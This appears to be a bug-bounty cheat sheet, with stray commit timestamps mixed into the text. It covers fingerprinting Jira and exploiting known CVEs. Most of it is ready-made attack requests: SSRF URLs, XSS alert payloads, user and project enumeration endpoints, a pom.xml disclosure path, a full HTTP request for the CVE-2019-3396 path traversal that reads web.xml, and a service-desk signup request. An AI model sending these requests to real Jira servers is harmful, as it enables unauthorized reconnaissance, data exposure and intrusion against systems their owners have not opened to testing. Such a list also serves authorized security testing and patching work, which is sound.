2022-06-18 13:26:55 +00:00
# Jira Common Bugs
## Introduction
What would you do if you came across a website that uses Jira?
## How to Detect
2022-06-22 04:41:21 +00:00
Try to HTTP request to `https://example.com/secure/Dashboard.jspa` or `https://example.com/login.jsp` and there is a form login
2022-06-18 13:26:55 +00:00
1. Find the related CVE by checking jira version
* How to find the jira version
2022-06-18 14:40:38 +00:00
Try to request to `https://example.com/secure/Dashboard.jspa` and then check the source code. You will find this line `<meta name="ajs-version-number" content="8.20.9">` so 8.20.9 is the jira version. If you found outdated jira version, find the CVEs at [CVEDetails ](https://www.cvedetails.com/vulnerability-list/vendor_id-3578/product_id-8170/Atlassian-Jira.html )
2022-06-18 13:26:55 +00:00
Some example CVE:
- CVE-2017-9506 (SSRF)
2021-02-04 00:08:28 +00:00
```
2022-06-18 13:26:55 +00:00
https://example.com/plugins/servlet/oauth/users/icon-uri?consumerUri=< SSRF_PAYLOAD >
2021-02-04 00:08:28 +00:00
```
2022-06-18 13:26:55 +00:00
- CVE-2018-20824 (XSS)
2021-02-04 00:08:28 +00:00
```
2022-06-18 13:26:55 +00:00
https://example.com/plugins/servlet/Wallboard/?dashboardId=10000& dashboardId=10000& cyclePeriod=alert(document.domain)
2021-02-04 00:08:28 +00:00
```
2022-06-18 13:26:55 +00:00
- CVE-2019-8451 (SSRF)
2021-02-04 00:08:28 +00:00
```
2022-06-18 13:26:55 +00:00
https://example.com/plugins/servlet/gadgets/makeRequest?url=https://< HOST_NAME > :1337@example.com
2021-02-04 00:08:28 +00:00
```
2022-06-18 13:26:55 +00:00
- CVE-2019-8449 (User Information Disclosure)
2021-02-04 00:08:28 +00:00
```
2022-06-18 13:26:55 +00:00
https://example.com/rest/api/latest/groupuserpicker?query=1& maxResults=50000& showAvatar=true
2021-02-04 00:08:28 +00:00
```
2022-06-18 13:26:55 +00:00
- CVE-2019-8442 (Sensitive Information Disclosure)
2021-02-04 00:08:28 +00:00
```
2022-06-18 13:26:55 +00:00
https://example.com/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
2021-02-04 00:08:28 +00:00
```
2022-06-18 13:26:55 +00:00
- CVE-2019-3403 (User Enumeration)
2021-02-04 00:08:28 +00:00
```
2022-06-18 13:26:55 +00:00
https://example.com/rest/api/2/user/picker?query=< USERNAME_HERE >
2021-02-04 00:08:28 +00:00
```
2022-06-18 13:26:55 +00:00
- CVE-2020-14181 (User Enumeration)
2021-02-04 00:08:28 +00:00
```
2022-06-18 13:26:55 +00:00
https://example.com/secure/ViewUserHover.jspa?username=< USERNAME >
2021-02-04 00:08:28 +00:00
```
2022-06-18 13:26:55 +00:00
- CVE-2020-14178 (Project Key Enumeration)
2021-02-04 00:08:28 +00:00
```
2022-06-18 13:26:55 +00:00
https://example.com/browse.< PROJECT_KEY >
2021-02-04 00:08:28 +00:00
```
2022-06-18 13:26:55 +00:00
- CVE-2020-14179 (Information Disclosure)
2021-02-04 00:08:28 +00:00
```
2022-06-18 13:26:55 +00:00
https://example.com/secure/QueryComponent!Default.jspa
2021-02-04 00:08:28 +00:00
```
2022-06-18 13:26:55 +00:00
- CVE-2019-11581 (Template Injection)
2021-02-04 00:08:28 +00:00
```
2022-06-18 13:26:55 +00:00
example.com/secure/ContactAdministrators!default.jspa
2021-02-04 00:08:28 +00:00
* Try the SSTI Payloads
```
2022-06-18 13:26:55 +00:00
- CVE-2019-3396 (Path Traversal)
2021-02-04 00:08:28 +00:00
```
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Language: en-US,en;q=0.5 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Referer: {{Hostname}}
Content-Length: 168
Connection: close
{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
*Try above request with the Jira target
```
2022-06-18 13:26:55 +00:00
- CVE-2019-3402 (XSS)
```
https://example.com/secure/ConfigurePortalPages!default.jspa?view=search& searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E& Search=Search
2021-02-04 00:08:28 +00:00
```
2022-06-18 13:26:55 +00:00
2. Signup enabled
```
POST /servicedesk/customer/user/signup HTTP/1.1
Host: example.com
Content-Type: application/json
{"email":"test@gmail.com","signUpContext":{},"secondaryEmail":"","usingNewUi":true}
2021-07-21 15:38:57 +00:00
```
2022-06-18 13:26:55 +00:00
## Reference
* [@harshbothra ](https://twitter.com/harshbothra )